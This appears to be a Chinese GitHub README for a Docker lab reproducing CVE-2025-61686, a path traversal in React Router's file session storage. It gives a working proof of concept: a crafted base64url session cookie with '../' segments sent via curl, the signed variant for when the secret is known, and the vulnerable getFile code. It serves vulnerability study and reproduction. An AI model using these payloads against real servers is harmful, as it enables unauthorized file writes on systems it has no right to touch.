# CVE-2025-61686_docker

## 启动

1.build

```bash
docker-compose up --build
```

2.start

```
docker-compose up
```

## 复现流程

1.构造符合穿越条件的session

```
└─$ echo -en '"AAAA../../../tmp/flower"'|base64 -w0 | tr '+/' '-_' | tr -d '='
IkFBQUEuLi8uLi8uLi90bXAvZmxvd2VyIg 
```

2.将构造session塞到Cookie，发送请求

```
└─$ curl -H 'Cookie: session=IkFBQUEuLi8uLi8uLi90bXAvZmxvd2VyIg' 'http://localhost:3001/'
```

3.验证

```
root@de14139fdebf:/app# ls /tmp
flower
```

## 漏洞成因

通过比对漏洞版本[7.9.3与7.9.4](https://github.com/remix-run/react-router/compare/%40react-router/node%407.9.3...%40react-router/node%407.9.4)可以发现，漏洞主要原因是 `react-router/packages/react-router-node/sessions
/fileStorage.ts` 文件中的 [getFile()](https://github.com/remix-run/react-router/blob/%40react-router/node%407.9.3/packages/react-router-node/sessions/fileStorage.ts#L107) 函数中对session的处理存在问题。

```bash
export function getFile(dir: string, id: string): string {
  // Divide the session id up into a directory (first 2 bytes) and filename
  // (remaining 6 bytes) to reduce the chance of having very large directories,
  // which should speed up file access. This is a maximum of 2^16 directories,
  // each with 2^48 files.
  return path.join(dir, id.slice(0, 4), id.slice(4));
}
```

此处会将session的前4位作为 `文件夹名` ，4位之后的作为 `文件名` ，所以攻击者仅需通过如下方式即可实现路径穿越，这便是漏洞公告说在session允许不使用secret情况下可以轻松实现目录穿越，当然如果攻击者能获取到用于加密session的secret那便也可以构造对应的穿越payload。

```bash
>>> import os
>>> os.path.join("./sessions", "aaaa","../../tmp/flowerwitch")
'./sessions/aaaa/../../tmp/flowerwitch'
```

## 已知secret情况下利用

对于获取到了secret的情况下，可以参考[sign()](https://github.com/remix-run/react-router/blob/main/packages/react-router/lib/server-runtime/crypto.ts#L3) 函数，使用secret对poc进行签名。

```
export const sign = async (value: string, secret: string): Promise<string> => {
  let data = encoder.encode(value);
  let key = await createKey(secret, ["sign"]);
  let signature = await crypto.subtle.sign("HMAC", key, data);
  let hash = btoa(String.fromCharCode(...new Uint8Array(signature))).replace(
    /=+$/,
    "",
  );

  return value + "." + hash;
};
```

<img width="1257" height="1086" alt="image" src="https://github.com/user-attachments/assets/c54fb50d-9d66-423f-a519-eefeaeb24e2e" />


用生成的session发起请求

```bash
└─$ curl -H 'Cookie: session=IkFBQUEuLi8uLi8uLi8uLi90bXAvZmxvd2Vyd2l0Y2gi.L2ffutps16%2B3ENWvuWy4ZCouT%2BPSVeqmQOeaW%2FjziXg' 'http://localhost:3001/'
```

确认漏洞触发

```bash
root@eb8750bd4a56:/tmp# ls
flowerwitch
```

签名生成脚本 [use_secret_create_payload.js](https://github.com/FlowerWitch/CVE-2025-61686_docker/blob/main/vulnerable/use_secret_create_payload.js)
